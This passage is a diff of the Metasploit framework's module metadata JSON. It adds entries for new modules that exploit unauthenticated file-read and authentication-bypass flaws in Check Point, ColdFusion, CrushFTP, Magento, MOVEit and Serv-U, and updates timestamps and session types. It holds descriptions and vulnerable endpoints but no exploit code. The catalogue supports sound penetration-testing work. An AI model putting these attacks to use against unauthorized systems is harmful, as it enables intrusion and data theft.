    "path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_escalate_execute_as",
@@ -7308,7 +7379,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-03-27 09:54:38 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_exec.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_exec",
@@ -7364,7 +7435,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-02-19 10:57:53 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_findandsampledata",
@@ -7415,7 +7486,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-02-19 10:34:16 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_idf.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_idf",
@@ -7567,7 +7638,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-03-27 09:54:38 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_sql.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_sql",
@@ -7618,7 +7689,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-02-19 10:34:16 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_sql_file.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_sql_file",
@@ -8195,7 +8266,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-02-03 18:12:53 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/networking/cisco_vpn_3000_ftp_bypass",
@@ -9198,6 +9269,67 @@

    ]
  },
+  "auxiliary_admin/registry_security_descriptor": {
+    "name": "Windows Registry Security Descriptor Utility",
+    "fullname": "auxiliary/admin/registry_security_descriptor",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Christophe De La Fuente"
+    ],
+    "description": "Read or write a Windows registry security descriptor remotely.\n\n          In READ mode, the `FILE` option can be set to specify where the\n          security descriptor should be written to.\n\n          The following format is used:\n          ```\n          key: <registry key>\n          security_info: <security information>\n          sd: <security descriptor as a hex string>\n          ```\n\n          In WRITE mode, the `FILE` option can be used to specify the information\n          needed to write the security descriptor to the remote registry. The file must\n          follow the same format as described above.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": null,
+    "mod_time": "2024-05-13 12:01:54 +0000",
+    "path": "/modules/auxiliary/admin/registry_security_descriptor.rb",
+    "is_install_path": true,
+    "ref_name": "admin/registry_security_descriptor",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "smb"
+    ],
+    "needs_cleanup": false,
+    "actions": [
+      {
+        "name": "READ",
+        "description": "Read a Windows registry security descriptor"
+      },
+      {
+        "name": "WRITE",
+        "description": "Write a Windows registry security descriptor"
+      }
+    ]
+  },
  "auxiliary_admin/sap/cve_2020_6207_solman_rce": {
    "name": "SAP Solution Manager remote unauthorized OS commands execution",
    "fullname": "auxiliary/admin/sap/cve_2020_6207_solman_rce",
@@ -12407,7 +12539,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
    "path": "/modules/auxiliary/cloud/aws/enum_ssm.rb",
    "is_install_path": true,
    "ref_name": "cloud/aws/enum_ssm",
@@ -12554,7 +12686,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-08-24 21:38:44 +0000",
+    "mod_time": "2024-05-23 12:23:27 +0000",
    "path": "/modules/auxiliary/crawler/msfcrawler.rb",
    "is_install_path": true,
    "ref_name": "crawler/msfcrawler",
@@ -19776,7 +19908,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-12-01 08:03:32 +0000",
+    "mod_time": "2024-07-23 09:56:40 +0000",
    "path": "/modules/auxiliary/gather/asrep.rb",
    "is_install_path": true,
    "ref_name": "gather/asrep",
@@ -19798,7 +19930,9 @@
        "asreproast"
      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [
      {
@@ -20212,6 +20346,67 @@

    ]
  },
+  "auxiliary_gather/checkpoint_gateway_fileread_cve_2024_24919": {
+    "name": "Check Point Security Gateway Arbitrary File Read",
+    "fullname": "auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "remmons-r7"
+    ],
+    "description": "This module leverages an unauthenticated arbitrary root file read vulnerability for\n          Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades\n          are enabled on affected devices, traversal payloads can be used to read any files on\n          the local file system. Password hashes read from disk may be cracked, potentially\n          resulting in administrator-level access to the target device. This vulnerability is\n          tracked as CVE-2024-24919.",
+    "references": [
+      "URL-https://support.checkpoint.com/results/sk/sk182336",
+      "URL-https://www.rapid7.com/blog/post/2024/05/30/etr-cve-2024-24919-check-point-security-gateway-information-disclosure/",
+      "URL-https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-06-13 08:14:35 +0000",
+    "path": "/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb",
+    "is_install_path": true,
+    "ref_name": "gather/checkpoint_gateway_fileread_cve_2024_24919",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_gather/checkpoint_hostname": {
    "name": "CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure",
    "fullname": "auxiliary/gather/checkpoint_hostname",
@@ -20616,6 +20811,70 @@
      }
    ]
  },
+  "auxiliary_gather/coldfusion_pms_servlet_file_read": {
+    "name": "CVE-2024-20767 - Adobe Coldfusion Arbitrary File Read",
+    "fullname": "auxiliary/gather/coldfusion_pms_servlet_file_read",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2024-03-12",
+    "type": "auxiliary",
+    "author": [
+      "ma4ter",
+      "yoryio",
+      "Christiaan Beek",
+      "jheysel-r7"
+    ],
+    "description": "This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version\n          '2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication\n          token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that\n          UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.",
+    "references": [
+      "CVE-2024-20767",
+      "URL-https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html",
+      "URL-https://jeva.cc/2973.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8500,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-05-02 09:47:22 +0000",
+    "path": "/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb",
+    "is_install_path": true,
+    "ref_name": "gather/coldfusion_pms_servlet_file_read",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_gather/coldfusion_pwd_props": {
    "name": "ColdFusion 'password.properties' Hash Extraction",
    "fullname": "auxiliary/gather/coldfusion_pwd_props",
@@ -20770,6 +21029,66 @@

    ]
  },
+  "auxiliary_gather/crushftp_fileread_cve_2024_4040": {
+    "name": "CrushFTP Unauthenticated Arbitrary File Read",
+    "fullname": "auxiliary/gather/crushftp_fileread_cve_2024_4040",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "remmons-r7"
+    ],
+    "description": "This module leverages an unauthenticated server-side template injection vulnerability in CrushFTP < 10.7.1 and\n          < 11.1.0 (as well as legacy 9.x versions). Attackers can submit template injection payloads to the web API without\n          authentication. When attacker payloads are reflected in the server's responses, the payloads are evaluated. The\n          primary impact of the injection is arbitrary file read as root, which can result in authentication bypass, remote\n          code execution, and NetNTLMv2 theft (when the host OS is Windows and SMB egress traffic is permitted).",
+    "references": [
+      "CVE-2024-4040",
+      "URL-https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-05-03 12:01:48 +0000",
+    "path": "/modules/auxiliary/gather/crushftp_fileread_cve_2024_4040.rb",
+    "is_install_path": true,
+    "ref_name": "gather/crushftp_fileread_cve_2024_4040",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_gather/cve_2021_27850_apache_tapestry_hmac_key": {
    "name": "Apache Tapestry HMAC secret key leak",
    "fullname": "auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key",
@@ -21901,7 +22220,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-02-15 10:47:30 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/auxiliary/gather/grandstream_ucm62xx_sql_account_guess.rb",
    "is_install_path": true,
    "ref_name": "gather/grandstream_ucm62xx_sql_account_guess",
@@ -22591,6 +22910,129 @@

    ]
  },
+  "auxiliary_gather/jasmin_ransomware_dir_traversal": {
+    "name": "Jasmin Ransomware Web Server Unauthenticated Directory Traversal",
+    "fullname": "auxiliary/gather/jasmin_ransomware_dir_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-04-08",
+    "type": "auxiliary",
+    "author": [
+      "chebuya",
+      "h00die"
+    ],
+    "description": "The Jasmin Ransomware web server contains an unauthenticated directory traversal vulnerability\n          within the download functionality. As of April 15, 2024 this was still unpatched, so all\n          versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.",
+    "references": [
+      "CVE-2024-30851",
+      "URL-https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc",
+      "URL-https://github.com/codesiddhant/Jasmin-Ransomware"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-05-04 16:06:48 +0000",
+    "path": "/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "gather/jasmin_ransomware_dir_traversal",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
+  "auxiliary_gather/jasmin_ransomware_sqli": {
+    "name": "Jasmin Ransomware Web Server Unauthenticated SQL Injection",
+    "fullname": "auxiliary/gather/jasmin_ransomware_sqli",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-04-08",
+    "type": "auxiliary",
+    "author": [
+      "chebuya",
+      "h00die"
+    ],
+    "description": "The Jasmin Ransomware web server contains an unauthenticated SQL injection vulnerability\n          within the login functionality. As of April 15, 2024 this was still unpatched, so all\n          versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.\n\n          Retrieving the victim's data may take a long amount of time. It is much quicker to\n          get the logins, then just login to the site.",
+    "references": [
+      "URL-https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc",
+      "URL-https://github.com/codesiddhant/Jasmin-Ransomware"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-05-04 16:06:48 +0000",
+    "path": "/modules/auxiliary/gather/jasmin_ransomware_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "gather/jasmin_ransomware_sqli",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_gather/java_rmi_registry": {
    "name": "Java RMI Registry Interfaces Enumeration",
    "fullname": "auxiliary/gather/java_rmi_registry",
@@ -23153,7 +23595,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-04-19 15:49:36 +0000",
+    "mod_time": "2024-06-18 17:39:06 +0000",
    "path": "/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_esc_vulnerable_cert_finder",
@@ -23175,7 +23617,9 @@
        "Certipy"
      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [

@@ -23208,7 +23652,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
    "path": "/modules/auxiliary/gather/ldap_hashdump.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_hashdump",
@@ -23226,7 +23670,9 @@

      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [
      {
@@ -23261,7 +23707,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-04-10 22:44:23 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
    "path": "/modules/auxiliary/gather/ldap_query.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_query",
@@ -23279,7 +23725,9 @@

      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [
      {
@@ -23412,6 +23860,67 @@
      }
    ]
  },
+  "auxiliary_gather/magento_xxe_cve_2024_34102": {
+    "name": "Magento XXE Unserialize Arbitrary File Read",
+    "fullname": "auxiliary/gather/magento_xxe_cve_2024_34102",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2024-06-11",
+    "type": "auxiliary",
+    "author": [
+      "Sergey Temnikov",
+      "Heyder"
+    ],
+    "description": "This module exploits a XXE vulnerability in Magento 2.4.7-p1 and below which allows an attacker to read any file on the system.",
+    "references": [
+      "CVE-2024-34102",
+      "URL-https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-07-18 11:56:22 +0000",
+    "path": "/modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb",
+    "is_install_path": true,
+    "ref_name": "gather/magento_xxe_cve_2024_34102",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_gather/manageengine_adaudit_plus_xnode_enum": {
    "name": "ManageEngine ADAudit Plus Xnode Enumeration",
    "fullname": "auxiliary/gather/manageengine_adaudit_plus_xnode_enum",
@@ -24680,6 +25189,57 @@

    ]
  },
+  "auxiliary_gather/progress_moveit_sftp_fileread_cve_2024_5806": {
+    "name": "Progress MOVEit SFTP Authentication Bypass for Arbitrary File Read",
+    "fullname": "auxiliary/gather/progress_moveit_sftp_fileread_cve_2024_5806",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2024-06-25",
+    "type": "auxiliary",
+    "author": [
+      "sfewer-r7"
+    ],
+    "description": "This module exploits CVE-2024-5806, an authentication bypass vulnerability in the MOVEit Transfer SFTP service. The\n          following version are affected:\n\n          * MOVEit Transfer 2023.0.x (Fixed in 2023.0.11)\n          * MOVEit Transfer 2023.1.x (Fixed in 2023.1.6)\n          * MOVEit Transfer 2024.0.x (Fixed in 2024.0.2)\n\n          The module can establish an authenticated SFTP session for a MOVEit Transfer user. The module allows for both listing\n          the contents of a directory, and the reading of an arbitrary file.",
+    "references": [
+      "CVE-2024-5806",
+      "URL-https://attackerkb.com/topics/44EZLG2xgL/cve-2024-5806/rapid7-analysis"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 22,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2024-07-03 17:12:03 +0000",
+    "path": "/modules/auxiliary/gather/progress_moveit_sftp_fileread_cve_2024_5806.rb",
+    "is_install_path": true,
+    "ref_name": "gather/progress_moveit_sftp_fileread_cve_2024_5806",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_gather/prometheus_api_gather": {
    "name": "Prometheus API Information Gather",
    "fullname": "auxiliary/gather/prometheus_api_gather",
@@ -24775,7 +25335,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-08-15 15:55:23 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/auxiliary/gather/prometheus_node_exporter_gather.rb",
    "is_install_path": true,
    "ref_name": "gather/prometheus_node_exporter_gather",
@@ -25808,6 +26368,68 @@

    ]
  },
+  "auxiliary_gather/solarwinds_servu_fileread_cve_2024_28995": {
+    "name": "SolarWinds Serv-U Unauthenticated Arbitrary File Read",
+    "fullname": "auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "sfewer-r7",
+      "Hussein Daher"
+    ],
+    "description": "This module exploits an unauthenticated file read vulnerability, due to directory traversal, affecting\n          SolarWinds Serv-U FTP Server 15.4, Serv-U Gateway 15.4, and Serv-U MFT Server 15.4. All versions prior to\n          the vendor supplied hotfix \"15.4.2 Hotfix 2\" (version 15.4.2.157) are affected.",
+    "references": [
+      "CVE-2024-28995",
+      "URL-https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28995",
+      "URL-https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-06-19 13:20:52 +0000",
+    "path": "/modules/auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995.rb",
+    "is_install_path": true,
+    "ref_name": "gather/solarwinds_servu_fileread_cve_2024_28995",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_gather/splunk_raw_server_info": {
    "name": "Splunk __raw Server Info Disclosure ",
    "fullname": "auxiliary/gather/splunk_raw_server_info",
@@ -26276,7 +26898,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-04-12 13:09:34 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
    "path": "/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb",
    "is_install_path": true,
    "ref_name": "gather/vmware_vcenter_vmdir_ldap",
@@ -26294,7 +26916,9 @@

      ]
    },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
    "needs_cleanup": false,
    "actions": [
      {
@@ -26951,7 +27575,7 @@
      "Yvain",
      "Grant Willcox"
    ],
-    "description": "The module use the ZoomEye API to search ZoomEye. ZoomEye is a search\n          engine for cyberspace that lets the user find specific network\n          components(ip, services, etc.).\n          Mind to enclose the whole request with quotes and limit the span of filters:\n          `set zoomeye_dork 'country:\"france\"+some+query'`\n\n          Setting facets will output a simple report on the overall search. It's values are:\n          Host search: app, device, service, os, port, country, city\n          Web search: webapp, component, framework, frontend, server, waf, os, country, city\n\n          Possible filters values are:\n          Host search: app, ver, device, os, service, ip, cidr, hostname, port, city, country, asn\n          Web search: app, header, keywords, desc, title, ip, site, city, country",
+    "description": "The module use the ZoomEye API to search ZoomEye. ZoomEye is a search\n          engine for cyberspace that lets the user find specific network\n          components(ip, services, etc.).\n\n          Setting facets will output a simple report on the overall search. It's values are:\n          Host search: app, device, service, os, port, country, city\n          Web search: webapp, component, framework, frontend, server, waf, os, country, city\n\n          Possible filters values are:\n          Host search: app, ver, device, os, service, ip, cidr, hostname, port, city, country, asn\n          Web search: app, header, keywords, desc, title, ip, site, city, country",
    "references": [
      "URL-https://github.com/knownsec/ZoomEye-python",
      "URL-https://www.zoomeye.org/api/doc",
@@ -26961,18 +27585,27 @@
    "arch": "",
    "rport": null,
    "autofilter_ports": [
-
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
    ],
    "autofilter_services": [
-
+      "http",
+      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-06-11 05:43:53 +0000",
    "path": "/modules/auxiliary/gather/zoomeye_search.rb",
    "is_install_path": true,
    "ref_name": "gather/zoomeye_search",
    "check": false,
-    "post_auth": true,
+    "post_auth": false,
    "default_credential": false,
    "notes": {
    },
@@ -27095,7 +27728,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-31 16:50:37 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/acpp/login.rb",
    "is_install_path": true,
    "ref_name": "scanner/acpp/login",
@@ -27137,7 +27770,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/afp/afp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/afp/afp_login",
@@ -27500,7 +28133,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/db2/db2_auth.rb",
    "is_install_path": true,
    "ref_name": "scanner/db2/db2_auth",
@@ -27765,6 +28398,56 @@

    ]
  },
+  "auxiliary_scanner/dcerpc/nrpc_enumusers": {
+    "name": "MS-NRPC Domain Users Enumeration",
+    "fullname": "auxiliary/scanner/dcerpc/nrpc_enumusers",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Haidar Kabibo <https://x.com/haider_kabibo>"
+    ],
+    "description": "This module will enumerate valid Domain Users via no authentication against MS-NRPC interface.\n          It calls DsrGetDcNameEx2 to check if the domain user account exists or not. It has been tested with\n          Windows servers 2012, 2016, 2019 and 2022.",
+    "references": [
+      "URL-https://github.com/klsecservices/Publications/blob/master/A_journey_into_forgotten_Null_Session_and_MS-RPC_interfaces.pdf"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2024-06-24 16:06:38 +0000",
+    "path": "/modules/auxiliary/scanner/dcerpc/nrpc_enumusers.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/dcerpc/nrpc_enumusers",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_scanner/dcerpc/petitpotam": {
    "name": "PetitPotam",
    "fullname": "auxiliary/scanner/dcerpc/petitpotam",
@@ -28778,7 +29461,7 @@
      "ftp"
    ],
    "targets": null,
-    "mod_time": "2023-04-18 23:44:58 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/ftp/ftp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ftp/ftp_login",
@@ -29289,7 +29972,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/advantech_webaccess_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/advantech_webaccess_login",
@@ -29933,7 +30616,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 15:37:48 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/appletv_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/appletv_login",
@@ -30093,7 +30776,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/axis_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/axis_login",
@@ -30145,7 +30828,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-10-05 13:19:36 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/azure_ad_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/azure_ad_login",
@@ -30297,7 +30980,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/bavision_cam_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/bavision_cam_login",
@@ -30605,7 +31288,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/buffalo_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/buffalo_login",
@@ -30709,7 +31392,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/caidao_bruteforce_login",
@@ -30966,7 +31649,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-09-02 11:41:27 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/chef_webui_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/chef_webui_login",
@@ -31392,7 +32075,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/cisco_firepower_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_firepower_login",
@@ -32438,7 +33121,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/directadmin_login.rb",
